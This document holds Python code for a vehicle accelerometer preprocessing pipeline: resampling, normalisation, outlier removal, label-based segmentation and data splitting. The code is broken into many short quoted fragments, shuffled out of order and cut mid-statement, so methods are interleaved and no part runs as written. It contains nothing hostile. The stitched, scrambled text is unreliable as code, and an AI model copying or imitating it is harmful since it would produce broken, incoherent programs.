TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)", "car_valid_segments = self.segment_data(data_valid, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_valid_segments = [] for car_segment in car_valid_segments:", "Remove NaNs :param data: :param replacement_mode: string, 'mean', 'replacement_val', 'delet_row' :param replacement_value: any", "label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: data_test_segments.append(road_segment) #Segment Valid car_valid_segments = self.segment_data(data_valid,", "'semantic': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'labels': # 1. Select all data with", "segments #3. Remove segments that are too long or too short after splitting", "if replacement_mode == 'quantile': # Source for next 7 lines of code after", "data.min()) # to center around 0.0 substract 0.5 return data except (TypeError, NotImplementedError,", "mode == 'mean_estimate_gravity': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gyroscope': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode", "reduced.reset_index(drop=True) old_index = data.index data = data.reset_index(drop=True) data = pandas.concat([data, reduced], axis=1) data", "data.shape[0] test_len = int(data_len * test_sz) train_len = int(data_len * train_sz) valid_len =", "data is None or mode is None or reduced_column_name is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)", "else: mean = data.mean() std = data.std() data = (data - data.mean()) /", "on a label column, semantic segementation of a fixed interval. :param data: :param", "list) or not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if len(columns) < 1: raise ValueError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value)", "enumerate(target_columns): data[column] = data[column] - data[args[ind]] return data if mode == 'orientation': if", "not None: segments_combined = segments_combined.reset_index() segments_combined.index = pandas.DatetimeIndex( segments_combined.index.astype('datetime64[1s]')) segments_aggregated.append(segments_combined) return segments_aggregated except", "except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def project_accelerometer_to_global_coordinates(self, data, target_columns, mode, args=None): \"\"\" Project", "except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_outliers_from_quantitative_data(self, data, replacement_mode, columns, quantile = None,", "time. :param data: :param column: :param unit: :return: \"\"\" # Source: # https://stackoverflow.com/questions/19231871/convert-unix-time-to-readable-date-in-pandas-dataframe", "pandas.to_datetime(data[column], unit=unit) return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc())", "data.index data = data.reset_index(drop=False) data = data.set_index(old_index) return data if replacement_mode == 'threshold':", "TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'mean' or mode is None: return data.resample(freq).mean() if mode", "replacement_mode='del_row') #data_test = self.remove_nans(data_test, replacement_mode='del_row') #data_valid = self.remove_nans(data_valid, replacement_mode='del_row') #print(data_train.head(100)) return data_train, mean_train,", "inplace=True) print('Resample') data = self.resample_quantitative_data(data, freq=freq) # 8000 1.25 Hz print('Dimensionality reduction') data", "# https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.resample.html # https://jakevdp.github.io/PythonDataScienceHandbook/03.11-working-with-time-series.html try: if data is None or freq is None:", "approach via TS Fresh )[:-1] return data @overrides def training_split_process(self, data, config, labels):", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if not all(column in data.keys() for column in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value)", "self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def inference_split_process(self, data, config, meta_data): \"\"\"", "Fresh )[:-2] data_train = data_train.loc[:, ~data_train.columns.duplicated()] data_test = data_test.loc[:, ~data_test.columns.duplicated()] data_valid = data_valid.loc[:,", "#TODO make configureable #data_test['acceleration_abs'] = data_test['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_valid['acceleration_abs'] = data_valid['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3)", "or not isinstance(unwanted_labels, list) or not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode ==", "motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Valid for ind in range(len(data_valid_segments)): data_valid_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_valid_segments[ind],", "axis=0) # 1. Ensure index is datetime index and standardize type data.index =", "- quantile), data[column].quantile(quantile) ) data[column] = data[column][not_outliers] index_names = data[~not_outliers].index data.drop(index_names, inplace=True) old_index", ":return: \"\"\" raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) @overrides def reduce_quantitativ_data_dimensionality(self, data, mode, reduced_column_name = 'reduced', columns", "segment in min_length_subsegements: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return min_length_subsegements #3. Resample and aggregate data", "std = data[columns].std() data[columns] = (data[columns] - data[columns].mean()) / data[columns].std() else: mean =", "reduction technique to a data set. :param data: :param mode: :param reduced_column_name: :param", "#Test data_test = self.de_segment_data(data_test_segments, selected_columns) data_test, mean_test, std_test = self.znormalize_quantitative_data(data_test, selected_columns[:-2], mean_train, std_train)", "mean is not None and std is not None: if columns is not", "= data.rename(columns={0: reduced_column_name}) data = data.reset_index(drop=True) data = data.set_index(old_index) return data if mode", "from pipeline.feature_engineering.preprocessing.replacement_strategies.del_row_replacement_strategy import DelRowReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.replacement_val_replacement_strategy import ReplacementValReplacementStrategy from overrides import overrides import", "if not exact_length: for segment in segments: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return segments #3.", "mode == 'semantic': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'labels': # 1. Select all", "data_train, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for classical approach via TS", "os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def znormalize_quantitative_data(self, data, columns = None, mean", "pandas.DataFrame) or not isinstance(mode, str) or not isinstance(target_columns, list): raise TypeError(type(data)) if mode", "axis=axis) data = data.reset_index(drop=True) return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except", "self.logger.error(traceback.format_exc()) os._exit(2) @overrides def znormalize_quantitative_data(self, data, columns = None, mean = None, std", "mode: :param reduced_column_name: :param columns: :return: \"\"\" try: if data is None or", "column in enumerate(target_columns): data[column] = data[column] - data[args[ind]] return data if mode ==", "data_valid_segments = [] for car_segment in car_valid_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels", "data[column] = data[column] - data[args[ind]] return data if mode == 'orientation': if len(target_columns)+1", "min_periods=1, win_type='gaussian').sum(std=3) #TODO make configureable #data_test['acceleration_abs'] = data_test['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_valid['acceleration_abs'] = data_valid['acceleration_abs'].rolling(5,", "data: :param unwanted_labels: :param replacement_mode: :return: \"\"\" try: if data is None or", "= config['pre_proc_resample_freq'] #'1000ms' print('Convert time unit, label data, remove nans') data = self.convert_unix_to_datetime(data,", "columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Valid for ind in range(len(data_valid_segments)): data_valid_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_valid_segments[ind], mode=config['feature_eng_dim_reduction_type'],", "indices # Source for next 3 lines after comment: # https://stackoverflow.com/questions/56257329/how-to-split-a-dataframe-based-on-consecutive-index non_sequence =", "= data[column] - data[args[ind]] return data if mode == 'orientation': if len(target_columns)+1 !=", "NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def convert_unix_to_datetime(self, data, column,", "== 'gyroscope': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gravity': if len(target_columns) != len(args): raise", "selected_data_segments = [group for _, group in selected_data.groupby(grouper)] for segment in selected_data_segments: data_segments.append(segment)", ":return: \"\"\" try: if data is None or mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)", "#Test for ind in range(len(data_test_segments)): data_test_segments[ind] = data_test_segments[ind].set_index('time') data_test_segments[ind] = self.resample_quantitative_data(data_test_segments[ind], freq=freq) #Valid", "raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gyroscope': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gravity': if", "min-max-normalization to a data set. :param data: :param columns: :return: \"\"\" try: if", "https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation # https://en.wikipedia.org/wiki/Homogeneous_coordinates # #https://stackoverflow.com/questions/2422750/in-opengl-vertex-shaders-what-is-w-and-why-do-i-divide-by-it for ind, column in enumerate(target_columns): data[column] = data[column]", "None and std is not None: if columns is not None: data[columns] =", "selected_columns[:-2]) data_train = self.remove_outliers_from_quantitative_data( data_train, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for", "else: data = (data - data.min()) / (data.max() - data.min()) # to center", "Preprocessor from pipeline.feature_engineering.preprocessing.replacement_strategies.mean_replacement_strategy import MeanReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.del_row_replacement_strategy import DelRowReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.replacement_val_replacement_strategy import ReplacementValReplacementStrategy", "DelRowReplacementStrategy().replace(data, 'NaN') if replacement_mode == 'replacement_val': return ReplacementValReplacementStrategy().replace(data, 'NaN', replacement_vals=replacement_value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except", "self.znormalize_quantitative_data(data_valid, selected_columns[:-2], mean_train, std_train) data_valid = self.remove_outliers_from_quantitative_data( data_valid, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current", "set. :param current_representation: :param target_representation: :param data: :return: \"\"\" raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) @overrides def", "self.logger.error(traceback.format_exc()) os._exit(2) @overrides def inference_split_process(self, data, config, meta_data): \"\"\" Apply all preprocessing steps", "std_train = self.znormalize_quantitative_data(data_train, selected_columns[:-2]) data_train = self.remove_outliers_from_quantitative_data( data_train, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current", "labels): \"\"\" Apply all preprocessing steps necessary for training. :param data: pandas.DataFrame :param", "remove_nans(self, data, replacement_mode, replacement_value=None): \"\"\" Remove NaNs :param data: :param replacement_mode: string, 'mean',", "config['pre_proc_test_sz'] train_sz = config['pre_proc_training_sz'] valid_sz = config['pre_proc_validation_sz'] #acelerometer_columns = ['acceleration_x', 'acceleration_y', 'acceleration_z'] acelerometer_columns", "isinstance(mode, str) or not isinstance(target_columns, list): raise TypeError(type(data)) if mode == 'mean_estimate_gravity': raise", "TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'semantic': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value)", "data_valid_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_valid_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns,", "data.resample(freq).mean() if mode == 'sum': return data.resample(freq).sum() except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1)", "= data.head(train_len), data.tail(test_len+valid_len) data_test = data_test_valid.head(test_len) data_valid = data_test_valid.tail(valid_len) print('Segment by labels') #Segment", "raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) # Source for theory behind below calculation # https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation # https://en.wikipedia.org/wiki/Homogeneous_coordinates", "accelerometer data from local vehicle coordinates to a global coordinate system. :param data:", "= 'time', unit = 'ms') data = self.label_data(data, labels) data = self.remove_nans(data, replacement_mode='del_row')", "#'1000ms' print('Convert time unit, label data, remove nans') data = self.convert_unix_to_datetime(data, column =", "isinstance(data, pandas.DataFrame) or not isinstance(columns, list) or not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if", "nans') data = self.convert_unix_to_datetime(data, column = 'time', unit = 'ms') data = self.label_data(data,", "euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Test for ind in range(len(data_test_segments)): data_test_segments[ind] =", "data if mode == 'manhatten': reduced = data[columns].sum(axis=1).apply(numpy.abs, axis=1) old_index = data.index data", "is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode ==", "#3. Resample and aggregate data segments_combined = None for segment in min_length_subsegements: segment", "data: :param replacement_mode: string, 'mean', 'replacement_val', 'delet_row' :param replacement_value: any type, used as", "if data is None or labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not (isinstance(data,", "print('Resample') #Train for ind in range(len(data_train_segments)): data_train_segments[ind] = data_train_segments[ind].set_index('time') data_train_segments[ind] = self.resample_quantitative_data(data_train_segments[ind], freq=freq)", "'labels': # 1. Select all data with desired label value data_segments = []", "data.head(train_len), data.tail(test_len+valid_len) data_test = data_test_valid.head(test_len) data_valid = data_test_valid.tail(valid_len) print('Segment by labels') #Segment Train", "column: :param unit: :return: \"\"\" # Source: # https://stackoverflow.com/questions/19231871/convert-unix-time-to-readable-date-in-pandas-dataframe # https://stackoverflow.com/questions/42698421/pandas-to-datetime-from-milliseconds-produces-incorrect-datetime try: if", "data, config, meta_data): \"\"\" Apply all preprocessing steps necessary for inference. :param data:", "isinstance(reduced_column_name, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'euclidean': # Source: # https://thispointer.com/pandas-apply-apply-a-function-to-each-row-column-in-dataframe/ #", "data_valid.loc[:, ~data_valid.columns.duplicated()] #print('Rolling mean smoothing') #data_train['acceleration_abs'] = data_train['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #TODO make configureable", "car_train_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: data_train_segments.append(road_segment)", "or labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not (isinstance(data, pandas.DataFrame) and isinstance(labels, pandas.DataFrame)):", "\"\"\" Segements a time series based on a label column, semantic segementation of", "pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) segment = self.resample_quantitative_data(segment, freq=\"{}s\".format(segment_length), mode = 'mean') if segments_combined is None: segments_combined", "0.5 return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2)", "except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def encode_categorical_features(self, data, mode, columns, encoding_function): \"\"\" Encode", "[config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] selected_coarse_labels = config['pre_proc_movement_type_label'] #[5] selected_road_labels = config['pre_proc_road_type_label'] #[1, 3] freq", "self.reduce_quantitativ_data_dimensionality( data=data_test_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' )", "# https://nextjournal.com/schmudde/how-to-remove-outliers-in-data for column in columns: not_outliers = data[column].between( data[column].quantile(1.0 - quantile), data[column].quantile(quantile)", "pandas.concat((labels, data), axis=1) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2)", "ind, column in enumerate(target_columns): data[column] = data[column] * (data[args[ind]] / data[args[3]]) return data", "mode == 'manhatten': reduced = data[columns].sum(axis=1).apply(numpy.abs, axis=1) old_index = data.index data = pandas.concat([data,", "next 3 lines after comment: # https://stackoverflow.com/questions/56257329/how-to-split-a-dataframe-based-on-consecutive-index non_sequence = pandas.Series(selected_data.index).diff() != 1 grouper", "reduction') data = self.reduce_quantitativ_data_dimensionality( data=data, mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif", "= None): \"\"\" Resamples quantitative data. :param data: :param freq: :param mode: :return:", "os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def project_accelerometer_to_global_coordinates(self, data, target_columns, mode, args=None): \"\"\"", "# Source: # https://stackoverflow.com/questions/19231871/convert-unix-time-to-readable-date-in-pandas-dataframe # https://stackoverflow.com/questions/42698421/pandas-to-datetime-from-milliseconds-produces-incorrect-datetime try: if data is None or column", "None or column is None or unit is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not", "None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(freq, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)", "self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: data_train_segments.append(road_segment) #Segment Test car_test_segments", "NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_outliers_from_quantitative_data(self, data, replacement_mode,", "return data.resample(freq).sum() except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides", "os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def re_represent_data(self, current_representation, target_representation, data): \"\"\" Change", "from pipeline.feature_engineering.preprocessing.abstract_preprocessor import Preprocessor from pipeline.feature_engineering.preprocessing.replacement_strategies.mean_replacement_strategy import MeanReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.del_row_replacement_strategy import DelRowReplacementStrategy from", "is not None and std is not None: if columns is not None:", "preprocessing steps necessary for training. :param data: pandas.DataFrame :param params: List :return: pandas.DataFrame,", "in car_test_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments:", "Fresh )[:-2] #Test data_test = self.de_segment_data(data_test_segments, selected_columns) data_test, mean_test, std_test = self.znormalize_quantitative_data(data_test, selected_columns[:-2],", "data, unwanted_labels, replacement_mode): \"\"\" Remove rows that have an unwanted label. :param data:", "= data_train['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #TODO make configureable #data_test['acceleration_abs'] = data_test['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_valid['acceleration_abs']", "'ms') data = self.label_data(data, labels) data = self.remove_nans(data, replacement_mode='del_row') print('Train, Test, Validation split')", "mode, columns, encoding_function): \"\"\" Encode categorical features using an encoding function. :param data:", "== 'mean' or mode is None: return data.resample(freq).mean() if mode == 'sum': return", "== 'del_row': return DelRowReplacementStrategy().replace(data, 'unwanted_labels', unwanted_labels) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc())", "reduced = reduced.reset_index(drop=True) old_index = data.index data = data.reset_index(drop=True) data = pandas.concat([data, reduced],", "NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'labels': # 1. Select all data with desired label", "not isinstance(freq, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'mean' or mode is None:", "Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_unwanted_labels(self, data, unwanted_labels, replacement_mode): \"\"\" Remove rows that", "\"\"\" Apply all preprocessing steps necessary for inference. :param data: pandas.DataFrame :param params:", ":return: \"\"\" # Source: # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.resample.html # https://jakevdp.github.io/PythonDataScienceHandbook/03.11-working-with-time-series.html try: if data is None", "unix time stamps to date time. :param data: :param column: :param unit: :return:", "mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Test for", "data = self.remove_nans(data, replacement_mode='del_row') data.set_index(data['time'], drop=True, inplace=True) print('Resample') data = self.resample_quantitative_data(data, freq=freq) #", "if mode == 'orientation': if len(target_columns)+1 != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) # Source for", "= data_test_segments[ind].set_index('time') data_test_segments[ind] = self.resample_quantitative_data(data_test_segments[ind], freq=freq) #Valid for ind in range(len(data_valid_segments)): data_valid_segments[ind] =", "raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if columns is not None: data[columns]=(data[columns]-data[columns].min())/(data[columns].max()-data[columns].min()) # to center around 0.0", "def segment_data(self, data, mode, label_column=None, args=None): \"\"\" Segements a time series based on", "in data.keys() for column in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if mean is None and", "segments_combined = segment else: segments_combined = pandas.concat([segments_combined, segment], axis=0) if segments_combined is not", "reduced = pandas.DataFrame((numpy.dot(pca.components_, data[columns].T).T)) reduced = reduced.rename(columns={0:reduced_column_name}) reduced = reduced.reset_index(drop=True) old_index = data.index", "self.remove_outliers_from_quantitative_data( data_train, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for classical approach via", "args=selected_coarse_labels) data_train_segments = [] for car_segment in car_train_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label',", "'orientation': if len(target_columns)+1 != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) # Source for theory behind below", "isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance( columns, list): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)", "if mode == 'semantic': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'labels': # 1. Select", "#[5] selected_road_labels = config['pre_proc_road_type_label'] #[1, 3] freq = config['pre_proc_resample_freq'] #'1000ms' print('Convert time unit,", "data.index data = pandas.concat([data, reduced], axis=1) data = data.rename(columns={0: reduced_column_name}) data = data.reset_index(drop=True)", "'mean': return MeanReplacementStrategy().replace(data, 'NaN') if replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data, 'NaN') if replacement_mode", "Train car_train_segments = self.segment_data(data_train, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_train_segments = [] for car_segment in", "all preprocessing steps necessary for inference. :param data: pandas.DataFrame :param params: List :return:", "all(column in data.keys() for column in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if columns is not", "than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Test for ind in range(len(data_test_segments)): data_test_segments[ind]", "car_test_segments = self.segment_data(data_test, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_test_segments = [] for car_segment in car_test_segments:", "ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_unwanted_labels(self, data, unwanted_labels, replacement_mode):", "NaNs :param data: :param replacement_mode: string, 'mean', 'replacement_val', 'delet_row' :param replacement_value: any type,", "Ensure index is datetime index and standardize type data.index = pandas.DatetimeIndex(data.index.astype('datetime64[1s]')) #2. Segment", "type, used as value if replacment_mode is 'default_val' :return: pandas.DataFrame \"\"\" try: if", "self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_unwanted_labels(self, data, unwanted_labels, replacement_mode): \"\"\"", "Valid car_valid_segments = self.segment_data(data_valid, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_valid_segments = [] for car_segment in", "train_len = int(data_len * train_sz) valid_len = int(data_len * valid_sz) data_train, data_test_valid =", ":return: \"\"\" try: if data is None or labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)", "NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def resample_quantitative_data(self, data, freq,", "import DelRowReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.replacement_val_replacement_strategy import ReplacementValReplacementStrategy from overrides import overrides import traceback import", "data @overrides def training_split_process(self, data, config, labels): \"\"\" Apply all preprocessing steps necessary", "3] freq = config['pre_proc_resample_freq'] #'1000ms' print('Convert time unit, label data, remove nans') data", "if segment.shape[0] == segment_length: min_length_subsegements.append(segment) if not aggregate: for segment in min_length_subsegements: segment.index", "segementation of a fixed interval. :param data: :param mode: :param label_column: :param args:", "data set. :param data: :param columns: :param mean: :param std: :return: \"\"\" try:", "for column in columns: data[column] = encoding_function(data[column]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError,", "pandas.DataFrame((numpy.dot(pca.components_, data[columns].T).T)) reduced = reduced.rename(columns={0:reduced_column_name}) reduced = reduced.reset_index(drop=True) old_index = data.index data =", "a data set. :param data: :param columns: :param mean: :param std: :return: \"\"\"", "is not None: data[columns] = (data[columns] - mean) / std else: data =", "freq: :param mode: :return: \"\"\" # Source: # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.resample.html # https://jakevdp.github.io/PythonDataScienceHandbook/03.11-working-with-time-series.html try: if", "mean_test, std_test = self.znormalize_quantitative_data(data_test, selected_columns[:-2], mean_train, std_train) data_test = self.remove_outliers_from_quantitative_data( data_test, replacement_mode='quantile', columns=selected_columns[:-2],", "\"\"\" Encode categorical features using an encoding function. :param data: :param mode: :param", "print('Fetch params') acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] freq = config['pre_proc_resample_freq'] # '1000ms' mean_train", "\"\"\" # Source: # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.resample.html # https://jakevdp.github.io/PythonDataScienceHandbook/03.11-working-with-time-series.html try: if data is None or", "not isinstance(data, pandas.DataFrame) or not isinstance(columns, list) or not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if len(columns) < 1: raise ValueError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if replacement_mode == 'quantile': #", "[config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] freq = config['pre_proc_resample_freq'] # '1000ms' mean_train = meta_data['mean_train'] std_train =", "for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing, outlier removal') selected_columns = ['acceleration_abs'] data, mean,", "data.set_index(old_index) return data if mode == 'pca': # Source: # https://stackoverflow.com/questions/23282130/principal-components-analysis-using-pandas-dataframe # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names", "if mode == 'gyroscope': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gravity': if len(target_columns) !=", "#[1, 3] freq = config['pre_proc_resample_freq'] #'1000ms' print('Convert time unit, label data, remove nans')", "data set. :param data: :param columns: :return: \"\"\" try: if data is None:", "'NaN') if replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data, 'NaN') if replacement_mode == 'replacement_val': return", "freq=freq) # 8000 1.25 Hz print('Dimensionality reduction') data = self.reduce_quantitativ_data_dimensionality( data=data, mode=config['feature_eng_dim_reduction_type'], #", "current run @0.95 for classical approach via TS Fresh )[:-2] data_train = data_train.loc[:,", "data is None or labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not (isinstance(data, pandas.DataFrame)", "data = data.set_index(old_index) return data if mode == 'manhatten': reduced = data[columns].sum(axis=1).apply(numpy.abs, axis=1)", "quantile), data[column].quantile(quantile) ) data[column] = data[column][not_outliers] index_names = data[~not_outliers].index data.drop(index_names, inplace=True) old_index =", "= pandas.concat([segments_combined, segment], axis=0) if segments_combined is not None: segments_combined = segments_combined.reset_index() segments_combined.index", "'manhatten': reduced = data[columns].sum(axis=1).apply(numpy.abs, axis=1) old_index = data.index data = pandas.concat([data, reduced], axis=1)", "if data is None: data = data_segments[ind][selected_columns] else: data = pandas.concat([data, data_segments[ind][selected_columns]], axis=axis)", "or not isinstance( columns, list): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'custom_function': if encoding_function", "freq = config['pre_proc_resample_freq'] #'1000ms' print('Convert time unit, label data, remove nans') data =", "\"\"\" try: if data is None or replacement_mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if", "@0.95 for classical approach via TS Fresh )[:-1] return data @overrides def training_split_process(self,", "Source for next 3 lines after comment: # https://stackoverflow.com/questions/56257329/how-to-split-a-dataframe-based-on-consecutive-index non_sequence = pandas.Series(selected_data.index).diff() !=", "= int(data_len * train_sz) valid_len = int(data_len * valid_sz) data_train, data_test_valid = data.head(train_len),", "def znormalize_quantitative_data(self, data, columns = None, mean = None, std = None): \"\"\"", "data = self.remove_nans(data, replacement_mode='del_row') print('Train, Test, Validation split') data_len = data.shape[0] test_len =", "os._exit(2) @overrides def re_represent_data(self, current_representation, target_representation, data): \"\"\" Change representation of a data", "not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if not all(column in data.keys() for column in", "= self.resample_quantitative_data(data_train_segments[ind], freq=freq) # 8000 1.25 